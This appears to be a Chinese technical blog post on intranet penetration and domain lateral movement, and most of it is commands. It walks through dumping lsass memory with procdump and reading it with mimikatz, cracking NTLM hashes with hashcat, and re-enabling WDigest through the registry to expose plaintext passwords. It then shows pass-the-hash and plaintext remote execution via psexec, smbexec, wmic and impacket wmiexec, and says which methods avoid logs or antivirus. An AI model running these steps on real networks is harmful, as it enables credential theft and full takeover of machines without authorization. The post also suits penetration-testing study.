【内网渗透】域横向smb&wmi明文或hash传递

最新推荐文章于 2024-05-17 15:33:57 发布
最新推荐文章于 2024-05-17 15:33:57 发布
阅读量1.3k 收藏 7
点赞数 3
分类专栏: 内网渗透 文章标签: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/114480116
版权

目录

0x001 Procdump+Mimikatz配合获取用户信息

Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地的Mimikatz打开Procdump获取的用户信息。

Procdump下载:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

# procdump 在目标机上执行
procdump -accepteula -ma lsass.exe lsass.dmp

# mimikatz 在本地执行:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

0x002 无法获取明文密码解决方案

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码

针对以上情况,我们提供了4种方式解决此类问题

  • 1.利用哈希hash传递(pth,ptk等)进行移动
  • 2.利用其它服务协议(SMB,WMI等)进行哈希移动
  • 3.利用注册表操作开启Wdigest Auth值进行获取
  • 4.利用工具或第三方平台(Hachcat)进行破解获取
1)hashcat暴力破解

Windows系统LM HashNTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash

hashcat -a 0 -m 1000 hash file --force

破解工具:https://github.com/hashcat/hashcat
更多参考:https://www.freebuf.com/sectool/164507.html

2)注册表操作开启Wdigest Auth值
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
3)SMB服务协议进行哈希移动

利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放

# psexec第一种:先有ipc链接,psexec需要明文或hash传递
net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator
psexec \\192.168.3.32 -s cmd # 需要先有ipc链接 -s以System权限运行

# psexec第二种:不用建立IPC直接提供明文账户密码
psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd 
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32  // 实际操作中连接不上
// 以上两种方式使用的官方Pstools内的工具    

# smbexec第三种:无需先ipc链接 明文或hash传递  非官方自带-参考impacket工具包使用,操作简单,容易被杀
smbexec god/administrator:Admin12345@192.168.3.21
smbexec ./administrator:admin!@#45@192.168.3.32
smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

Pstools官方工具包:https://docs.microsoft.com/en-us/sysinternals/downloads/pstools

impacket工具包下载:https://gitee.com/RichChigga/impacket-examples-windows

4)WMI服务利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

# 自带WMIC命令 明文传递 无回显   
wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c  ipconfig >C:\1.txt"

# 自带cscript配合wmiexec.vbs脚本 明文传递 有回显
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

# 第三方套件impacket wmiexec  明文或hash传递 有回显exe版本  容易被杀软查杀
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

wmiexec.vbs脚本下载:https://www.secpulse.com/wp-content/uploads/2015/05/cache-a360611dc24d240989799c29c555e4b7_wmiexec-v1_1.rar

参考文章:http://www.91ri.org/12908.html

多学点技术
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件
HACKONE的博客
06-22 468
因此在内网渗透中,我们可以使用WMI进行横向移动,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。SMB服务通常由文件服务器提供,它允许客户端计算机通过网络访问服务器上的共享资源。通过SMB用户可以在网络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。它支持不同的两台机器上的组件间的通信,不论它们是运行在局网、广网、还是Internet上。这里ping 3.32 是能ping通的 所以防火墙入站规则是关闭的,可以执行正向shell。
【内网安全】横向smb&wmi明文hash传递
_Co1a
09-12 1081
下面讲的是psexec&smbexec以及wimc&wmiexec 知识点1: windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,提供了4钟方式解决此类问题 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其它服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启wdigest Auth值进行...
第67天-内网安全-横向smb&wmi明文hash传递
MCTSOG的博客
05-12 974
思维导图 知识点 无法获取明文密码: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本若安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其它服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 注册表操作开启Wdigest Auth值 reg add HKL
内网安全-横向smb&wmi明文hash传递
xhscxj的博客
03-11 3753
知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(path,ptk等)进行移动 2.利用其他服务协议(SMBWMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 4.利用工具或第三方平台(Hachcat)进行破解获取 ...
渗透——哈希传递、黄金票据
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-30 850
渗透 1. 安装 接着点击安装向导 加入: 需要设置dns服务器为控机 控可以登陆任意中的电脑 Windows认证协议 - Kerberos,也可以叫做票据 我们查看控 在cmd输入 net user /domain 还可以在dns里查看,一般dns都是控机 当我们获取到了administator的权限的时候,我们可以利用windows官方的工具去提权 指令: psexec -i -d -s cmd.exe//获取权限 然后再次输入net user /domain,就可以获取
内网安全:横向传递攻击(SMB || WMI 明文hash 传递
网络安全领域___专研者.
06-09 2696
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文Hash值获取基础上进行攻击.)
渗透测试 _ 内网信息收集1
08-03
【渗透测试】是一种安全测试方法,旨在模拟黑客攻击行为,以发现并评估计算机网络或系统的安全性。内网信息收集是渗透测试的重要阶段,它决定了测试的效率和成功率。本文主要探讨了内网信息收集的基本概念和方法。 ...
ISC-内网渗透 -最终版.pdf
04-08
通过对Active Directory渗透的基础知识、认证方式、远程命令执行技术及内网渗透流程的详细介绍,我们可以了解到,在实施内网渗透时,掌握这些核心技术点对于成功渗透目标网络至关重要。此外,合理运用各种技术和工具...
内网安全攻防-渗透测试指南 读书笔记.pdf
09-09
### 内网安全攻防-渗透测试指南 读书笔记 #### 一、内网渗透测试基础 在进行内网渗透测试之前,理解Powershell执行策略及其如何影响脚本运行至关重要。 - **Powershell执行策略**:Powershell的安全执行策略通过...
C#实例 实现WMI连接目标,运行命令与获取计算机信息并能打开对方SMB同时实现连接并完成文件传输一整套解决方案 附Log4Net日志
03-01
C#实例 实现WMI连接目标,运行命令与查询状态并能打开对方SMB同时实现连接并完成文件传输一整套解决方案 附Log4Net日志 此实例完整演示了如何连接135RPC服务,即WMI服务,实现功能: 1、远程获取计算机信息 2、执行...
Windows内网远程执行命令的几种方式.pdf
11-25
除了上述提到的方法外,还有其他多种远程执行命令的方式,如IPC COPY文件触发执行命令、psexec远程执行命令、MIMIkatz和Cobalt Strike的HASH传递等。每种方法都有其优缺点,具体选择哪种方法取决于实际需求和技术...
横向移动 -基于smb&wmi 明文hash 传递
mingyqf的博客
11-10 802
内网 横向 smb&wmi 明文hash 传递 演示案例:  Procdump+Mimikatz 配合获取  Hashcat 破解获取 Windows NTML Hash横向移动 SMB 服务利用-psexec,smbexec  横向移动 WMI 服务利用-cscript,wmiexec,wmic  横向移动以上服务 hash 批量利用-python 编译 exe 案例 1-Procdump+Mimikatz 配合获取 1.1procdump 配合 mimikatz
渗透之wmi协议进行密码或hash传递
最新发布
qq_55202378的博客
05-17 273
wmi服务是比smb服务更高级一些的,在日志中是找不到痕迹的,但是这个主要是传递管理员的用户凭据。
哈希传递常用方法
路虽远,行将至。事虽难,做必达。
05-13 541
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。
哈希传递攻击(Pass-the-Hash
热门推荐
whoim_i的博客
12-25 1万+
目录使用msf进行哈希传递攻击使用mimikatz进行哈希传递攻击PTH(工作组) 使用msf进行哈希传递攻击 有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享)打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(注意:只能是adminis...
内网渗透总结三:第三步利用明文或者hash进行横向移动
yggcwhat
05-06 1222
内网渗透总结三:第三步利用明文或者hash进行横向移动
〖教程〗Ladon SmbExec Hash传递远程执行命令
K8哥哥
09-15 560
Ladon8.8更新功能 [+]SmbExec NTLM-HASH非交互执行无回显 [u]GetInfo 新增Vmware虚拟机信息 [u]OsScan 新增识别Vigor Router路由器识别 [u]新增Xen\VBOX\Hybrid\Parallels虚拟机识别 [+]GetInfo 新增cmdkey、RrpLog、安装驱动、软件列表、最近访问文件等 [+]GetInfo 新增GUID、CPUID、硬盘ID、自启动后门检测(DLL却持、注册表等) [+]GetInfo2 新增WMI补丁信息获
Windows NTLM HashHash传递、Key传递攻击
weixin_30563917的博客
07-04 1964
Hash(Key) 获取 工具: Mimikatz 用法: .\mimikatz.exe privilege::debug #查看权限 sekurlsa::logonpasswords #获取hash明文密码(如果可以的话) sekurlsa::ekeys #获取kerberos加密凭证 Hash(Key)传递 Mimikatz sekurlsa::pth /user:xxxxxxx...
内网渗透wmic的使用
01-17 5126
简介 Windows Management Instrumentation (WMI) 是在基于 Windows 的操作系统上管理数据和操作的基础结构。您可以编写 WMI 脚本或应用程序来自动执行远程计算机上的管理任务,而且WMI 还向操作系统和产品的其他部分提供管理数据,例如 System Center Operations Manager(以前称为 Microsoft Operations Manager (MOM))或 Windows远程管理 ( WinRM )。–微软官方文档 WMI可以描述为一
渗透技术详解:从ew到cobaltstrike的内网横移
"本文是关于渗透技术的深入讲解,主要涵盖了多个关键步骤和技术,包括ew穿透、网络扫描、MSF(Metasploit)与CS(Cobalt Strike)的结合使用、内网渗透横向移动以及权限提升等。文章以红日安全的ATT&CK靶场为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值